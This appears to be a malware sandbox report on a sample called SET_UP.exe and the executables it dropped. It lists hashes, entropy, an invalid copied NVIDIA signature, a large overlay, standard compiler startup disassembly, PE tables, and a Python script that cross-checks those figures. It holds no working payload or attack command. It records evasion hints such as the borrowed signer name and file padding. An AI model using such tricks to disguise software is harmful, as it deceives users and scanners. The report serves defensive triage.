                                                                                                                                                                                                SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe
                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):3367424
                                                                                                                                                                                                Entropy (8bit):6.530011244733973
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:98304:qJYVM+LtVt3P/KuG2ONG9iqLRQEd333T:7VL/tnHGYiql5l
                                                                                                                                                                                                MD5:F809F51E678B7F2E388F8C969EF902C8
                                                                                                                                                                                                SHA1:DC1C645533E0FD1637BF455BA69A9481E7C4B83A
                                                                                                                                                                                                SHA-256:8D6E5513DE230109BE2238537173352832D1AEBDC7B10FAD0E59D4882812CA81
                                                                                                                                                                                                SHA-512:C500B40B604AD6203396FCC0243CBB50EAD544586EAB2448C2C6BCC2106DFAE3777A85C344766224F5F695FA60295880623B2A97B0AAE97DC547076FA03CD067
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04.......3...@......@...................P,.n.....,.j:...P0.p.....................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc...p....P0......./.............@..@.............04......`3.............@..@................
Process:C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):846325235
Entropy (8bit):0.13954043794048707
Encrypted:false
SSDEEP:
MD5:6A8860A8150021B2D5B9BB707DE4FA37
SHA1:FEB8A10FEE0388E1D93C669444F3A237C38EA5E4
SHA-256:0CE2CDB61164F5C03D11DEF609873901F58510F764E8491B4EC1A5D3E0759E0B
SHA-512:899CC13F5CD136D9F3D06BD13BD608CAB1DCEC1CE2F550A371C76253CFB155149A2CAE9827A365CCCFFA921A607A684DC7CD1A15645D317D7D9C199CEA1735F8
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 8%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"w.RC..RC..RC..I..`C..I...C..[;..UC..[;..IC..RC...B..I..NC..I..{C..I..SC..I..SC..RichRC..........................PE..L....NKO......................h...................@..........................@r.......r.......@.........................................:.e..........................................................................................................text...!........................... ..`.rdata...1.......2..................@..@.data...x........,..................@....rsrc...:.e.......e.................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                Entropy (8bit):0.5870767528248201
                                                                                                                                                                                                TrID:
                                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                File name:SET_UP.exe
                                                                                                                                                                                                File size:76'245'722 bytes
                                                                                                                                                                                                MD5:7e62abcaf3030a9400fb60b5f2ee2484
                                                                                                                                                                                                SHA1:464edfd28fe39ebc0d2dae76660b3c6f1a047864
                                                                                                                                                                                                SHA256:84553c2f4085cc9ed47323ffd1b25bac55e216ba65b9ff45873bf6702da2553e
                                                                                                                                                                                                SHA512:70acf354e63538416f4583f3e535b5f9fc9778ea571629f81c7e00eb2c694c97b55dab4a6b39c8e6f9aafb6aa84eeb86665267fd39317dd2e309f8b18bd8478a
                                                                                                                                                                                                SSDEEP:24576:hqL7dQcuoTT1lzFvE6cW6fra3jZU1qTZrgWax0+F1OO/:hqnPsc6fW9UUTWtl
                                                                                                                                                                                                TLSH:68F7C513B9AAFBB0A7C930788722D9F95DF67C8893129CC7098D3A25F9235D64332535
                                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... i.gd..4d..4d..4d..4e..4...4n..4...4c..4...4e..4...4b..4...4}..4d..4_..4...4N..4R..4~..4R..4u..4...4e..4Richd..4........PE..L..
                                                                                                                                                                                                Icon Hash:45c939e17139c851
                                                                                                                                                                                                Entrypoint:0x4967be
                                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                                Digitally signed:true
                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                                                DLL Characteristics:
                                                                                                                                                                                                Time Stamp:0x676BB10D [Wed Dec 25 07:15:25 2024 UTC]
                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                OS Version Major:4
                                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                                File Version Major:4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: b214bce09c2713602d5f942f9ac78b98
Signature Valid: false
Signature Issuer: CN=VeriSign Class 3 Code Signing 2010 CA, OU=Terms of use at https://www.verisign.com/rpa (c)10, OU=VeriSign Trust Network, O="VeriSign, Inc.", C=US
Signature Validation Error: The digital signature of the object did not verify
Error Number: -2146869232 (as an HRESULT: 0x80096010, TRUST_E_BAD_DIGEST)
Reading: TRUST_E_BAD_DIGEST means the Authenticode hash stored in the certificate table does not match the file. The chain below names NVIDIA Corporation as signer, but either the signature block was copied from a genuinely signed NVIDIA binary or the file was modified after signing; in both cases the signer name lends the sample no trust. The certificate's validity window also ended on 26/07/2018.
Not Before, Not After:
• 27/07/2015 20:00:00, 26/07/2018 19:59:59
Subject Chain:
• CN=NVIDIA Corporation, O=NVIDIA Corporation, L=SANTA CLARA, S=California, C=US
Version: 3
Thumbprint MD5: F7219078FBE20BC1B98BF8A86BFC0396
Thumbprint SHA-1: 30632EA310114105969D0BDA28FDCE267104754F
Thumbprint SHA-256: 1B5061CF61C93822BDE2433156EEBE1F027C8FA9C88A4AF0EBD1348AF79C61E2
Serial: 14781BC862E8DC503A559346F5DCC518
Entry-point instructions (annotated). The sequence is the standard Visual C++ 6.0 CRT WinMainCRTStartup prologue, consistent with the compiler fingerprint listed below; the API and CRT names in the comments are inferred from the canonical crt0 sequence and the _RT_* codes pushed, not from symbols or the import table, and the entry point itself shows nothing sample-specific.
push ebp
mov ebp, esp
push FFFFFFFFh                        ; SEH frame: initial scope index -1
push 004DE1C0h                        ; scope table
push 0049CBCCh                        ; exception handler (__except_handler3)
mov eax, dword ptr fs:[00000000h]     ; link the frame into the SEH chain
push eax
mov dword ptr fs:[00000000h], esp
sub esp, 58h                          ; locals, including a STARTUPINFO at [ebp-5Ch]
push ebx
push esi
push edi
mov dword ptr [ebp-18h], esp
call dword ptr [004CE30Ch]            ; GetVersion (inferred: the result is split into version fields below)
xor edx, edx
mov dl, ah                            ; minor version
mov dword ptr [0050B540h], edx        ; _winminor
mov ecx, eax
and ecx, 000000FFh                    ; major version
mov dword ptr [0050B53Ch], ecx        ; _winmajor
shl ecx, 08h
add ecx, edx
mov dword ptr [0050B538h], ecx        ; _winver = (major << 8) | minor
shr eax, 10h
mov dword ptr [0050B534h], eax        ; _osver = build number
push 00000001h
call 00007F9A40E0661Eh                ; _heap_init(1)
pop ecx
test eax, eax
jne 00007F9A40E002DAh
push 0000001Ch                        ; _RT_HEAPINIT (28)
call 00007F9A40E00397h                ; fast_error_exit
pop ecx
call 00007F9A40E06329h                ; _mtinit
test eax, eax
jne 00007F9A40E002DAh
push 00000010h                        ; _RT_THREAD (16)
call 00007F9A40E00386h                ; fast_error_exit
pop ecx
xor esi, esi
mov dword ptr [ebp-04h], esi          ; enter __try scope 0
call 00007F9A40E06157h                ; _ioinit
call 00007F9A40E060B1h                ; GetCommandLineA
mov dword ptr [0050CE94h], eax        ; _acmdln
call 00007F9A40E05F3Ah                ; __crtGetEnvironmentStringsA
mov dword ptr [0050B520h], eax        ; _aenvptr
call 00007F9A40E05D07h                ; _setargv
call 00007F9A40E05C4Ah                ; _setenvp
call 00007F9A40E03CD6h                ; _cinit
mov dword ptr [ebp-30h], esi          ; StartupInfo.dwFlags = 0
lea eax, dword ptr [ebp-5Ch]
push eax
call dword ptr [004CE250h]            ; GetStartupInfoA(&StartupInfo) (inferred from the dwFlags/wShowWindow reads below)
call 00007F9A40E05BEEh                ; _wincmdln
mov dword ptr [ebp-64h], eax          ; lpszCommandLine for WinMain
test byte ptr [ebp-30h], 00000001h    ; dwFlags & STARTF_USESHOWWINDOW
je 00007F9A40E002D8h
movzx eax, word ptr [ebp-2Ch]         ; StartupInfo.wShowWindow
Programming Language:
• [ C ] VS98 (6.0) SP6 build 8804
• [C++] VS98 (6.0) SP6 build 8804
• [EXP] VC++ 6.0 SP5 build 8804
Data directories
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xeafa0 | 0x104 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x10e000 | 0xc5000 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x48b311a | 0x39c0 | (none: for this entry the address is a raw file offset, not an RVA; 0x48b311a lies far beyond the end of the section data, so the certificate table sits in a large overlay appended to the image)
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xce000 | 0x7b4 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Sections
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xcce18 | 0xcd000 | fac198aa53afe410c3dcf581545764bd | False | 0.5525735994664634 | data | 6.720139731616884 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0xce000 | 0x1f9a2 | 0x20000 | 83deabb2b79de26612795649a905c4ec | False | 0.3486328125 | data | 4.995286150286831 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xee000 | 0x1f9c8 | 0x1b000 | 4b8dcfd559e7ed4f1f9591313031eb50 | False | 0.31859447337962965 | data | 4.091038435139011 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x10e000 | 0xc5000 | 0xc5000 | 3c638a11b436c456ebccb0f0f050916c | False | 0.3541216390387056 | data | 5.653443529273793 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
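The numbers in the signature block and the section and directory tables above can be cross-checked without the sample. The following is an added example (not part of the Joe Sandbox report or its tooling): it transcribes the section table and the IMAGE_DIRECTORY_ENTRY_SECURITY entry from this page, converts the reported Error Number to its HRESULT, reproduces the per-section entropy statistic, maps directory RVAs to sections, and estimates how much data lies outside any section. The report gives no raw file offsets, so the 0x1000 header size and the back-to-back section layout are assumptions; the "Authenticode table is the last thing in the file" rule is the usual layout, so the file size derived from it is a lower bound.

```python
"""Cross-check a sandbox PE section/directory table (added example)."""
import math
from collections import Counter
from dataclasses import dataclass

HEADERS_RAW_SIZE = 0x1000  # ASSUMPTION: section data starts after a 4 KiB header block


@dataclass(frozen=True)
class Section:
    name: str
    virtual_address: int
    virtual_size: int
    raw_size: int
    entropy: float


# Transcribed from the report's section table.
SECTIONS = [
    Section(".text",  0x1000,   0xcce18, 0xcd000, 6.720139731616884),
    Section(".rdata", 0xce000,  0x1f9a2, 0x20000, 4.995286150286831),
    Section(".data",  0xee000,  0x1f9c8, 0x1b000, 4.091038435139011),
    Section(".rsrc",  0x10e000, 0xc5000, 0xc5000, 5.653443529273793),
]
# IMAGE_DIRECTORY_ENTRY_SECURITY from the report: (file offset, size). Unlike
# every other directory entry, this address is a raw file offset, not an RVA.
SECURITY_DIR = (0x48b311a, 0x39c0)


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, the statistic in the report's Entropy column (0.0 .. 8.0)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def hresult(error_number: int) -> int:
    """Convert the signed 32-bit Error Number (as printed by WinVerifyTrust
    callers) back to the unsigned HRESULT shown in Windows documentation."""
    return error_number & 0xFFFFFFFF


def rva_to_section(rva: int, sections=SECTIONS):
    """Name of the section whose virtual range contains rva, or None."""
    for s in sections:
        if s.virtual_address <= rva < s.virtual_address + s.virtual_size:
            return s.name
    return None


def sections_raw_end(sections=SECTIONS, headers=HEADERS_RAW_SIZE) -> int:
    """File offset where section data ends, assuming sections are laid out
    back to back after the headers (assumption, see lead-in)."""
    return headers + sum(s.raw_size for s in sections)


def overlay_report(security_dir=SECURITY_DIR, sections=SECTIONS) -> dict:
    """Where the Authenticode table sits relative to the sections, and how
    large the overlay must be at minimum."""
    cert_offset, cert_size = security_dir
    raw_end = sections_raw_end(sections)
    min_file_size = cert_offset + cert_size  # cert table is normally the last thing in the file
    return {
        "sections_raw_end": raw_end,
        "cert_in_overlay": cert_offset >= raw_end,
        "overlay_size_min": min_file_size - raw_end,
        "min_file_size": min_file_size,
    }


def flag_sections(threshold: float = 7.0, sections=SECTIONS):
    """Sections whose entropy exceeds a packed/encrypted heuristic threshold."""
    return [s.name for s in sections if s.entropy > threshold]


if __name__ == "__main__":
    print(f"Error Number -> HRESULT: 0x{hresult(-2146869232):08X}")
    for name, rva in (("IMPORT", 0xeafa0), ("IAT", 0xce000), ("RESOURCE", 0x10e000)):
        print(f"{name:9s} rva 0x{rva:x} -> {rva_to_section(rva)}")
    for k, v in overlay_report().items():
        print(f"{k:18s} {v:#x}" if isinstance(v, int) and not isinstance(v, bool) else f"{k:18s} {v}")
    print("high-entropy sections:", flag_sections())
```

Run as a script it prints the HRESULT 0x80096010 for the reported error number, confirms the import, IAT and resource directories fall in the sections the report names, and shows that the certificate table begins roughly 74 MB past the end of the section data. No section crosses the usual 7.0 entropy line, so whatever makes this file large is not packed code in the image itself but an overlay; carving everything after the section data and hashing it separately is the first thing to do when such a gap appears.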
Resources (the Type column is a libmagic guess on the raw resource bytes: the "Targa image data" and "AmigaOS bitmap font" labels on RT_CURSOR entries are false matches on plain cursor bitmaps, and a ZLIB complexity above 1.0 on the PNG entries only means the data is already deflate-compressed)
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
PNG | 0x175628 | 0x74d | PNG image data, 96 x 96, 8-bit/color RGBA, non-interlaced | English | United States | 1.0058855002675227
PNG | 0x175d78 | 0x85d | PNG image data, 96 x 96, 8-bit/color RGBA, non-interlaced | English | United States | 1.0051377860812705
PNG | 0x176b58 | 0x521 | PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced | English | United States | 1.0083777608530085
PNG | 0x177080 | 0x538 | PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced | English | United States | 1.0082335329341316
PNG | 0x1775b8 | 0x557 | PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced | English | United States | 1.008046817849305
PNG | 0x177b10 | 0x550 | PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced | English | United States | 1.0080882352941176
PNG | 0x178060 | 0x57c | PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced | English | United States | 1.0078347578347577
PNG | 0x1785e0 | 0x546 | PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced | English | United States | 1.0081481481481482
PNG | 0x178b28 | 0x58f | PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced | English | United States | 1.0077301475755447
PNG | 0x1790b8 | 0x534 | PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced | English | United States | 1.0082582582582582
PNG | 0x1795f0 | 0x534 | PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced | English | United States | 1.0082582582582582
PNG | 0x1765d8 | 0x579 | PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced | English | United States | 1.0078515346181298
RT_CURSOR | 0x14ab48 | 0x134 | data | English | United States | 0.37337662337662336
RT_CURSOR | 0x14ac98 | 0x134 | Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001" | English | United States | 0.5681818181818182
RT_CURSOR | 0x14ade8 | 0x134 | Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001" | English | United States | 0.5487012987012987
RT_CURSOR | 0x14af38 | 0x134 | Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001" | English | United States | 0.4383116883116883
RT_CURSOR | 0x14b088 | 0x134 | Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001" | English | United States | 0.41883116883116883
RT_CURSOR | 0x179b28 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4805194805194805
RT_CURSOR | 0x179c60 | 0xb4 | Targa image data - Map 32 x 65536 x 1 +16 "\001" | English | United States | 0.7
RT_CURSOR | 0x179d40 | 0x134 | data | English | United States | 0.4090909090909091
RT_CURSOR | 0x179e78 | 0xb4 | Targa image data - RLE 32 x 65536 x 1 +16 "\001" | English | United States | 0.5944444444444444
RT_CURSOR | 0x179f58 | 0x134 | AmigaOS bitmap font "(", fc_YSize 4294967288, 3840 elements, 2nd "\377\370\037\377\377\370\037\377\377\370\037\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rd | English | United States | 0.32142857142857145
RT_CURSOR | 0x17a090 | 0xb4 | Targa image data - RLE 32 x 65536 x 1 +16 "\001" | English | United States | 0.49444444444444446
RT_CURSOR | 0x17a170 | 0x134 | AmigaOS bitmap font "(", fc_YSize 4294967288, 3840 elements, 2nd "\377\360\037\377\377\370?\377\377\374\177\377\377\376\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rd | English | United States | 0.33766233766233766
RT_CURSOR | 0x17a2a8 | 0xb4 | Targa image data - RLE 32 x 65536 x 1 +16 "\001" | English | United States | 0.5
RT_CURSOR | 0x17a388 | 0x134 | AmigaOS bitmap font "(", fc_YSize 4294966787, 3840 elements, 2nd "\377\003\300\377\377\200\001\377\377\300\003\377\377\340\007\377\377\370\037\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rd | English | United States | 0.5616883116883117
RT_CURSOR | 0x17a4c0 | 0xb4 | Targa image data - RLE 32 x 65536 x 1 +16 "\001" | English | United States | 0.5444444444444444
RT_BITMAP | 0x11fce8 | 0x828 | Device independent bitmap graphic, 32 x 16 x 32, image size 2048, resolution 2835 x 2835 px/m | English | United States | 0.2413793103448276
RT_BITMAP | 0x12c5d8 | 0x2d28 | Device independent bitmap graphic, 120 x 24 x 32, image size 11520, resolution 2835 x 2835 px/m | English | United States | 0.015397923875432526
RT_BITMAP | 0x123e60 | 0x2d28 | Device independent bitmap graphic, 120 x 24 x 32, image size 11520, resolution 2835 x 2835 px/m | English | United States | 0.06548442906574395
RT_BITMAP | 0x12f300 | 0x2d28 | Device independent bitmap graphic, 120 x 24 x 32, image size 11520, resolution 2835 x 2835 px/m | English | United States | 0.014186851211072665
RT_BITMAP | 0x11cfc0 | 0x2d28 | Device independent bitmap graphic, 120 x 24 x 32, image size 11520, resolution 14173 x 14173 px/m | English | United States | 0.029238754325259516
RT_BITMAP | 0x120510 | 0x2d28 | Device independent bitmap graphic, 120 x 24 x 32, image size 11520, resolution 2835 x 2835 px/m | English | United States | 0.07681660899653979
RT_BITMAP | 0x1298b0 | 0x2d28 | Device independent bitmap graphic, 120 x 24 x 32, image size 11520, resolution 18142 x 18142 px/m | English | United States | 0.07378892733564014
RT_BITMAP | 0x114520 | 0x2428 | Device independent bitmap graphic, 96 x 24 x 32, image size 9216, resolution 2835 x 2835 px/m | English | United States | 0.028630077787381157
RT_BITMAP | 0x126b88 | 0x2d28 | Device independent bitmap graphic, 120 x 24 x 32, image size 11520, resolution 2835 x 2835 px/m | English | United States | 0.01972318339100346
RT_BITMAP | 0x1126f8 | 0x1e28 | Device independent bitmap graphic, 80 x 24 x 32, image size 7680, resolution 2835 x 2835 px/m | English | United States | 0.03212435233160622
RT_BITMAP | 0x11a298 | 0x2d28 | Device independent bitmap graphic, 120 x 24 x 32, image size 11520, resolution 2835 x 2835 px/m | English | United States | 0.10043252595155709
RT_BITMAP | 0x116948 | 0xc28 | Device independent bitmap graphic, 48 x 16 x 32, image size 3072, resolution 3309 x 3309 px/m | English | United States | 0.17834190231362468
RT_BITMAP | 0x117570 | 0x2d28 | Device independent bitmap graphic, 120 x 24 x 32, image size 11520, resolution 2835 x 2835 px/m | English | United States | 0.014359861591695501
                                                                                                                                                                                                RT_BITMAP0x1232380xc28Device independent bitmap graphic, 48 x 16 x 32, image size 3072, resolution 101857 x 101857 px/mEnglishUnited States0.09318766066838047
                                                                                                                                                                                                RT_BITMAP0x10f9d00x2d28Device independent bitmap graphic, 120 x 24 x 32, image size 11520, resolution 120945 x 120945 px/mEnglishUnited States0.08295847750865051
                                                                                                                                                                                                RT_BITMAP0x1320280x2d28Device independent bitmap graphic, 120 x 24 x 32, image size 11520, resolution 18142 x 18142 px/mEnglishUnited States0.07179930795847751
                                                                                                                                                                                                RT_BITMAP0x134d500x2d28Device independent bitmap graphic, 120 x 24 x 32, image size 11520, resolution 18142 x 18142 px/mEnglishUnited States0.10294117647058823
                                                                                                                                                                                                RT_BITMAP0x137d400x3028Device independent bitmap graphic, 96 x 32 x 32, image size 12288, resolution 3309 x 3309 px/mEnglishUnited States0.06870538611291369
                                                                                                                                                                                                RT_BITMAP0x13efb80x2d28Device independent bitmap graphic, 120 x 24 x 32, image size 11520, resolution 18142 x 18142 px/mEnglishUnited States0.04835640138408304
                                                                                                                                                                                                RT_BITMAP0x137a780x2c8Device independent bitmap graphic, 12 x 14 x 32, image size 672, resolution 18142 x 18142 px/mEnglishUnited States0.0800561797752809
                                                                                                                                                                                                RT_BITMAP0x1465080x1b8Device independent bitmap graphic, 20 x 5 x 32, image size 400, resolution 151181 x 151181 px/mEnglishUnited States0.2590909090909091
                                                                                                                                                                                                RT_BITMAP0x141ce00x4828Device independent bitmap graphic, 96 x 48 x 32, image size 18432, resolution 30236 x 30236 px/mEnglishUnited States0.03621697704634041
                                                                                                                                                                                                RT_BITMAP0x13ad680x3028Device independent bitmap graphic, 96 x 32 x 32, image size 12288, resolution 101857 x 101857 px/mEnglishUnited States0.06327060350421804
                                                                                                                                                                                                RT_BITMAP0x13dd900x1228Device independent bitmap graphic, 48 x 24 x 32, image size 4608, resolution 2835 x 2835 px/mEnglishUnited States0.21493115318416522
                                                                                                                                                                                                RT_BITMAP0x1466c00x268Device independent bitmap graphic, 6 x 24 x 32, image size 576, resolution 151181 x 151181 px/mEnglishUnited States0.14123376623376624
                                                                                                                                                                                                RT_BITMAP0x1469280x828Device independent bitmap graphic, 32 x 16 x 32, image size 2048, resolution 2835 x 2835 px/mEnglishUnited States0.19061302681992337
                                                                                                                                                                                                RT_BITMAP0x1471500x108Device independent bitmap graphic, 28 x 2 x 32, image size 224, resolution 2835 x 2835 px/mEnglishUnited States0.1856060606060606
                                                                                                                                                                                                RT_BITMAP0x1472580x828Device independent bitmap graphic, 32 x 16 x 32, image size 2048, resolution 2835 x 2835 px/mEnglishUnited States0.15373563218390804
                                                                                                                                                                                                RT_BITMAP0x147a800x2c8Device independent bitmap graphic, 12 x 14 x 32, image size 672, resolution 2835 x 2835 px/mEnglishUnited States0.0997191011235955
                                                                                                                                                                                                RT_BITMAP0x147d480x48Device independent bitmap graphic, 1 x 8 x 32, image size 32, resolution 2835 x 2835 px/mEnglishUnited States0.4166666666666667
                                                                                                                                                                                                RT_BITMAP0x147d900x868Device independent bitmap graphic, 66 x 8 x 32, image size 2112, resolution 2835 x 2835 px/mEnglishUnited States0.0766728624535316
                                                                                                                                                                                                RT_BITMAP0x17a5a00x5e4Device independent bitmap graphic, 70 x 39 x 4, image size 1404EnglishUnited States0.34615384615384615
                                                                                                                                                                                                RT_BITMAP0x17ac700xb8Device independent bitmap graphic, 12 x 10 x 4, image size 80EnglishUnited States0.44565217391304346
                                                                                                                                                                                                RT_BITMAP0x17ad280x16cDevice independent bitmap graphic, 39 x 13 x 4, image size 260EnglishUnited States0.28296703296703296
                                                                                                                                                                                                RT_BITMAP0x17ae980x144Device independent bitmap graphic, 33 x 11 x 4, image size 220EnglishUnited States0.37962962962962965
                                                                                                                                                                                                RT_ICON0x14ca000x4228Device independent bitmap graphic, 64 x 128 x 32, image size 0EnglishUnited States0.0374940954180444
                                                                                                                                                                                                RT_ICON0x150c280x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.06504149377593361
                                                                                                                                                                                                RT_ICON0x1531d00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.06660412757973734
                                                                                                                                                                                                RT_ICON0x1542780x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.12677304964539007
                                                                                                                                                                                                RT_ICON0x1547200x4228Device independent bitmap graphic, 64 x 128 x 32, image size 0EnglishUnited States0.0374940954180444
                                                                                                                                                                                                RT_ICON0x1589480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.06504149377593361
                                                                                                                                                                                                RT_ICON0x15aef00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.06660412757973734
                                                                                                                                                                                                RT_ICON0x15bf980x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.12677304964539007
                                                                                                                                                                                                RT_ICON0x15c4400x4228Device independent bitmap graphic, 64 x 128 x 32, image size 0EnglishUnited States0.0374940954180444
                                                                                                                                                                                                RT_ICON0x1606680x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.06504149377593361
                                                                                                                                                                                                RT_ICON0x162c100x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.06660412757973734
                                                                                                                                                                                                RT_ICON0x163cb80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.12677304964539007
                                                                                                                                                                                                RT_ICON0x1641600x4228Device independent bitmap graphic, 64 x 128 x 32, image size 0EnglishUnited States0.0374940954180444
                                                                                                                                                                                                RT_ICON0x1683880x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.06504149377593361
                                                                                                                                                                                                RT_ICON0x16a9300x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.06660412757973734
                                                                                                                                                                                                RT_ICON0x16b9d80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.12677304964539007
                                                                                                                                                                                                RT_ICON0x16be800x4228Device independent bitmap graphic, 64 x 128 x 32, image size 0EnglishUnited States0.0374940954180444
                                                                                                                                                                                                RT_ICON0x1700a80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.06504149377593361
                                                                                                                                                                                                RT_ICON0x1726500x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.06660412757973734
                                                                                                                                                                                                RT_ICON0x1736f80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.12677304964539007
                                                                                                                                                                                                RT_MENU0x173ba00x94eMatlab v4 mat-file (little endian) O, numeric, rows 4587536, columns 7077993, imaginaryEnglishUnited States0.35516372795969775
                                                                                                                                                                                                RT_MENU0x1744f00x1138dataEnglishUnited States0.22549909255898368
                                                                                                                                                                                                RT_DIALOG0x14c0f80x284dataEnglishUnited States0.5295031055900621
